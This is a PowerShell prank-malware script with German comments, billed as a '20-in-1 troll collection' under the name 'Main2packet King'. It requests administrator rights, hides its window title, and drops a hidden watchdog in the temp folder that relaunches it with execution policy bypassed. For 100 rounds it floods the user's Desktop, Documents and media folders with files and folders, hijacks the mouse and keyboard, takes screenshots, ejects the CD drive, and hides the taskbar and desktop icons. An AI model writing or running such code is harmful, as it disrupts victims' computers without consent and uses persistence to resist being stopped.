# ================================
# ULTIMATIVE 20-in-1 TROLL KOLLEKTION - MAIN2PACKET KING
# ================================

# Administrator-Rechte anfordern
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Start-Process PowerShell -Verb RunAs -ArgumentList "-File `"$PSCommandPath`""
    exit
}

# ===== ERROR HANDLING =====
$ErrorActionPreference = "SilentlyContinue"
$Host.UI.RawUI.WindowTitle = "Main2packet System"  # Unauffälliger Titel

# ===== KONFIGURATION =====
$global:trollActive = $true
$global:currentRound = 0
$global:maxRounds = 100
$desktop = [Environment]::GetFolderPath("Desktop")
$documents = [Environment]::GetFolderPath("MyDocuments")
$music = [Environment]::GetFolderPath("MyMusic")
$pictures = [Environment]::GetFolderPath("MyPictures")
$videos = [Environment]::GetFolderPath("MyVideos")

# ===== WATCHDOG =====
$watchdogScript = @"
while(`$true) {
    `$powershell = Get-Process powershell -ErrorAction SilentlyContinue | Where-Object {`$_.Id -ne `$pid -and `$_.Id -ne $pid}
    if (`$powershell.Count -eq 0) {
        Start-Process powershell -WindowStyle Hidden -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`""
    }
    Start-Sleep -Seconds 5
}
"@
$watchdogScript | Out-File "$env:TEMP\main2packet.ps1" -Encoding UTF8 -Force
Start-Process powershell -WindowStyle Hidden -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$env:TEMP\main2packet.ps1`""

# ===== START =====
Clear-Host
Write-Host "╔════════════════════════════════════════════╗" -ForegroundColor Red
Write-Host "║      👑 MAIN2PACKET KING SYSTEM 👑        ║" -ForegroundColor Red
Write-Host "╚════════════════════════════════════════════╝" -ForegroundColor Red
Write-Host ""
Write-Host "📊 Fortschritt: 0/$global:maxRounds" -ForegroundColor Yellow
Write-Host ""
Start-Sleep -Seconds 2

# Hauptschleife - 100 MAL!
while ($global:currentRound -lt $global:maxRounds) {
    $global:currentRound++
    
    # Fortschritt ANZEIGEN
    if ($global:currentRound -le $global:maxRounds) {
        Clear-Host
        Write-Host "╔════════════════════════════════════════════╗" -ForegroundColor Red
        Write-Host "║      👑 MAIN2PACKET KING SYSTEM 👑        ║" -ForegroundColor Red
        Write-Host "╚════════════════════════════════════════════╝" -ForegroundColor Red
        Write-Host ""
        Write-Host "📊 Fortschritt: $global:currentRound/$global:maxRounds" -ForegroundColor Green
        Write-Host ""
    }
    
    # TROLL 1: Desktop Dateien - MAIN2PACKET KING
    Write-Host "[1/20] 📂 Phase 1..." -ForegroundColor Green
    for ($i = 1; $i -le 10; $i++) {
        $filePath = Join-Path $desktop "MAIN2PACKET_KING_$global:currentRound`_$i.king"
        "👑 Main2packet King - Datei $i - Runde $global:currentRound" | Out-File $filePath -Encoding UTF8
    }
    
    # TROLL 2: Ordner - MAIN2PACKET KING
    Write-Host "[2/20] 📁 Phase 2..." -ForegroundColor Green
    for ($i = 1; $i -le 5; $i++) {
        $name = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})
        New-Item -Path "$desktop\MAIN2PACKET_KING_$name" -ItemType Directory -Force | Out-Null
    }
    
    # TROLL 3: Maus kurz
    Write-Host "[3/20] 🖱️ Phase 3..." -ForegroundColor Green
    Add-Type -AssemblyName System.Windows.Forms
    for ($i = 1; $i -le 5; $i++) {
        [System.Windows.Forms.Cursor]::Position = New-Object Drawing.Point (
            (Get-Random -Min 100 -Max 1000),
            (Get-Random -Min 100 -Max 700)
        )
        Start-Sleep -Milliseconds 100
    }
    
    # TROLL 4: Sound
    Write-Host "[4/20] 🔊 Phase 4..." -ForegroundColor Green
    Add-Type -AssemblyName System.Media
    $sounds = @("SystemAsterisk", "SystemExclamation", "SystemHand")
    $sound = Get-Random $sounds
    [System.Media.SystemSounds]::$sound.Play()
    
    # TROLL 5: Tasten
    Write-Host "[5/20] 🔒 Phase 5..." -ForegroundColor Green
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('{CAPSLOCK}')
    Start-Sleep -Milliseconds 100
    $wsh.SendKeys('{NUMLOCK}')
    Start-Sleep -Milliseconds 100
    
    # TROLL 6: Screenshot mit MAIN2PACKET KING Namen
    Write-Host "[6/20] 📸 Phase 6..." -ForegroundColor Green
    Add-Type -AssemblyName System.Windows.Forms
    $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
    $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.X, $screen.Y, 0, 0, $screen.Size)
    $bitmap.Save("$desktop\MAIN2PACKET_KING_SS$global:currentRound.png")
    $graphics.Dispose()
    $bitmap.Dispose()
    
    # TROLL 7: Popup mit MAIN2PACKET KING
    Write-Host "[7/20] 💬 Phase 7..." -ForegroundColor Green
    $popup = New-Object -ComObject Wscript.Shell
    $popup.Popup("👑 MAIN2PACKET KING - Runde $global:currentRound/$global:maxRounds", 1, "KING SYSTEM", 64)
    
    # TROLL 8: Farbwechsel
    Write-Host "[8/20] 🎨 Phase 8..." -ForegroundColor Green
    $colors = @("Red", "Green", "Blue", "Yellow", "Cyan", "Magenta")
    $color = Get-Random $colors
    $Host.UI.RawUI.BackgroundColor = $color
    Clear-Host
    
    # TROLL 9: Kopien mit MAIN2PACKET KING
    Write-Host "[9/20] 📋 Phase 9..." -ForegroundColor Green
    for ($i = 1; $i -le 3; $i++) {
        $filePath = Join-Path $desktop "MAIN2PACKET_KING_COPY_$global:currentRound`_$i.king"
        "👑 Kopie Nr. $i - Runde $global:currentRound" | Out-File $filePath -Encoding UTF8
    }
    
    # TROLL 10: Auto-Typing
    Write-Host "[10/20] ⌨️ Phase 10..." -ForegroundColor Green
    $wsh = New-Object -ComObject WScript.Shell
    $wsh.SendKeys('Main2packet King... ')
    
    # TROLL 11: Dokumente mit MAIN2PACKET KING
    Write-Host "[11/20] 📄 Phase 11..." -ForegroundColor Green
    for ($i = 1; $i -le 3; $i++) {
        $filePath = Join-Path $documents "MAIN2PACKET_KING_DOC_$global:currentRound`_$i.king"
        "👑 Dokument $i - Runde $global:currentRound" | Out-File $filePath -Encoding UTF8
    }
    
    # TROLL 12: Musik mit MAIN2PACKET KING
    Write-Host "[12/20] 🎵 Phase 12..." -ForegroundColor Green
    New-Item -Path "$music\MAIN2PACKET_KING_$global:currentRound" -ItemType Directory -Force | Out-Null
    
    # TROLL 13: Bilder mit MAIN2PACKET KING
    Write-Host "[13/20] 🖼️ Phase 13..." -ForegroundColor Green
    New-Item -Path "$pictures\MAIN2PACKET_KING_$global:currentRound" -ItemType Directory -Force | Out-Null
    
    # TROLL 14: Videos mit MAIN2PACKET KING
    Write-Host "[14/20] 🎬 Phase 14..." -ForegroundColor Green
    New-Item -Path "$videos\MAIN2PACKET_KING_$global:currentRound" -ItemType Directory -Force | Out-Null
    
    # TROLL 15: CD Laufwerk (nur einmal)
    if ($global:currentRound -eq 1) {
        Write-Host "[15/20] 💿 Phase 15..." -ForegroundColor Green
        $shell = New-Object -ComObject Shell.Application
        $shell.NameSpace(17).Self.InvokeVerb("eject") 2>$null
        Start-Sleep -Milliseconds 500
        $shell.NameSpace(17).Self.InvokeVerb("eject") 2>$null
    } else {
        Write-Host "[15/20] 💿 Phase 15..." -ForegroundColor DarkGray
    }
    
    # TROLL 16: Lautstärke
    Write-Host "[16/20] 🔊 Phase 16..." -ForegroundColor Green
    for ($v = 1; $v -le 3; $v++) {
        $wsh.SendKeys([char]174)
        Start-Sleep -Milliseconds 50
    }
    for ($v = 1; $v -le 3; $v++) {
        $wsh.SendKeys([char]175)
        Start-Sleep -Milliseconds 50
    }
    
    # TROLL 17: Taskleiste
    Write-Host "[17/20] 📊 Phase 17..." -ForegroundColor Green
    $signature = @'
[DllImport("user32.dll")]
public static extern IntPtr FindWindow(string className, string windowName);
[DllImport("user32.dll")]
public static extern int ShowWindow(IntPtr hwnd, int nCmdShow);
'@
    $type = Add-Type -MemberDefinition $signature -Name Win32Utils -Namespace Win32 -PassThru
    $hwnd = $type::FindWindow("Shell_TrayWnd", $null)
    $type::ShowWindow($hwnd, 0)
    Start-Sleep -Milliseconds 200
    $type::ShowWindow($hwnd, 1)
    
    # TROLL 18: Fenster minimieren
    Write-Host "[18/20] 🪟 Phase 18..." -ForegroundColor Green
    $shell = New-Object -ComObject "Shell.Application"
    $shell.MinimizeAll()
    Start-Sleep -Milliseconds 200
    $shell.UndoMinimizeALL()
    
    # TROLL 19: Flackern
    Write-Host "[19/20] 🖥️ Phase 19..." -ForegroundColor Green
    for ($f = 1; $f -le 3; $f++) {
        [Console]::CursorVisible = $false
        Start-Sleep -Milliseconds 30
        [Console]::CursorVisible = $true
        Start-Sleep -Milliseconds 30
    }
    
    # TROLL 20: Icons
    Write-Host "[20/20] 🖼️ Phase 20..." -ForegroundColor Green
    $signature = @'
[DllImport("user32.dll")]
public static extern IntPtr FindWindow(string className, string windowName);
[DllImport("user32.dll")]
public static extern IntPtr FindWindowEx(IntPtr parent, IntPtr child, string className, string windowName);
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'@
    $type = Add-Type -MemberDefinition $signature -Name IconUtils -Namespace Win32 -PassThru
    $progman = $type::FindWindow("Progman", $null)
    $defview = $type::FindWindowEx($progman, [IntPtr]::Zero, "SHELLDLL_DefView", $null)
    if ($defview -ne [IntPtr]::Zero) {
        $type::ShowWindow($defview, 0)
        Start-Sleep -Milliseconds 200
        $type::ShowWindow($defview, 1)
    }
    
    # Kurze Pause zwischen Runden
    Start-Sleep -Seconds 1
}

# ===== STILLES ENDE =====
# Watchdog beenden
Get-Process -Name "powershell" | Where-Object {$_.Id -ne $pid} | Stop-Process -Force -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\main2packet.ps1" -Force -ErrorAction SilentlyContinue

# Still beenden
exit
